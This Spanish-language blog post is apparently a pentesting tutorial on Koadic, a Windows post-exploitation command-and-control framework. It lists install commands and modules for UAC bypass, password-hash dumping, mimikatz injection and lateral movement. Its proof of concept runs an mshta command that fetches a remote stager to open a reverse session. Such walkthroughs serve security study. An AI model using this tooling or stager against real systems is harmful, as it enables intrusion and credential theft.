Post148 nn

C&C con Koadic


Introducción

Koadic, o COM Command & Control, es un rootkit de post-explotación de Windows similar a otras herramientas de prueba de penetración como Meterpreter y Powershell Empire. La principal diferencia es que Koadic realiza la mayoría de sus operaciones usando Windows Script Host (también conocido como JScript / VBScript), con compatibilidad en el núcleo para admitir una instalación predeterminada de Windows 2000 sin Service Packs (y versiones incluso potenciales de NT4) en todo el camino a través de Windows 10.

Es posible servir cargas útiles completamente en memoria desde la etapa 0 hasta más allá, así como también usar comunicaciones criptográficamente seguras sobre SSL y TLS (dependiendo de lo que el sistema operativo víctima haya habilitado).

Koadic también intenta ser compatible tanto con Python 2 como con Python 3.

 

Instalación

 

# git clone https://github.com/zerosum0x0/koadic.git

# cd koadic

# pip install -r requirements.txt

 

 

Funciones Principales

  1. Infectar Objetivos

  2. Elevar Privilegios (UAC Bypass)

  3. Dumps SAM/SECURITY contraseñas del sistema

  4. Escanear la red local en busca de puertos abiertos de tipo SMB

  5. Pivotear a otra maquina

 

Los Stagers atrapan zombis objetivo y te permiten usar implantes.

 

Module

Description

stager/js/mshta

serves payloads en memoria usando MSHTA.exe HTML Aplicaciones

stager/js/regsvr

serves payloads en memoria usando regsvr32.exe COM+ scriptlets

stager/js/rundll32_js

serves payloads en memoria usando rundll32.exe

stager/js/disk

serves payloads usando archivos sobre disco

 

Los implantes comienzan a trabajar en zombies.

 

Module

Description

implant/elevate/bypassuac_eventvwr

Usa enigma0x3's eventvwr.exe exploit para bypassear UAC en Windows 7, 8, y 10.

implant/elevate/bypassuac_sdclt

Usa enigma0x3's sdclt.exe exploit para bypassear UAC en Windows 10.

implant/fun/zombie

Máximo volumen y abre The Cranberries YouTube en una ventana oculta.

implant/fun/voice

Reproduce un mensaje sobre texto a voz.

implant/gather/clipboard

Recupera el contenido actual del portapapeles del usuario

implant/gather/hashdump_sam

Recupera las contraseñas hash de la sección SAM.

implant/gather/hashdump_dc

Hashes del controlador de dominio del archivo NTDS.dit.

implant/inject/mimikatz_dynwrapx

Inyecta una DLL reflexiva cargada para ejecutar powerkatz.dll (utilizando Dynamic Wrapper X).

implant/inject/mimikatz_dotnet2js

Inyecta una DLL reflejada cargada para ejecutar powerkatz.dll (@tirannido DotNetToJS).

implant/inject/shellcode_excel

Ejecuta una carga útil de shellcode arbitraria (si Excel está instalado).

implant/manage/enable_rdesktop

Permite escritorio remoto en el destino.

implant/manage/exec_cmd

Ejecute un comando arbitrario en el destino y, opcionalmente, reciba el resultado.

implant/pivot/stage_wmi

Engancha un zombie en otra máquina usando WMI.

implant/pivot/exec_psexec

Ejecute un comando en otra máquina usando psexec desde sysinternals.

implant/scan/tcp

Utiliza HTTP para escanear puertos TCP abiertos en la LAN zombie de destino.

implant/utils/download_file

Descarga un archivo del zombie objetivo.

implant/utils/upload_file

Carga un archivo desde el servidor de escucha a los zombies de destino.


Prueba de concepto

 

Iniciamos la aplicación ejecutando el script mediante el interprete

./kodiac

 

 

A comparación de otros framworks, no es necesario primero levantar un listener, al crear el stager el Listener se configura de acuerdo al stager

 

 

El stager mshta http://192.168.0.104:9999/74TZo Es el que tenemos que ejecutar en una terminal

 

 

Una vez que es ejecutado, podemos observar como se genera la sesión en reversa.

 

 

Ya a partir de aquí podemos empezar a los módulos que se mencionaron con anterioridad



Artículos que te pueden interesar

Mejores webshell para PHP y ASP

Las Webshells son scripts (código que contiene un conjunto de comandos a ejecutar) que se suben malintencionadamente en las páginas webs aprovechando alguna vulnerabilidad, cuya complejidad varía para realizar distintas acciones sobre el servidor que la soporta. Como ejemplo visual se muestra la esta imagen..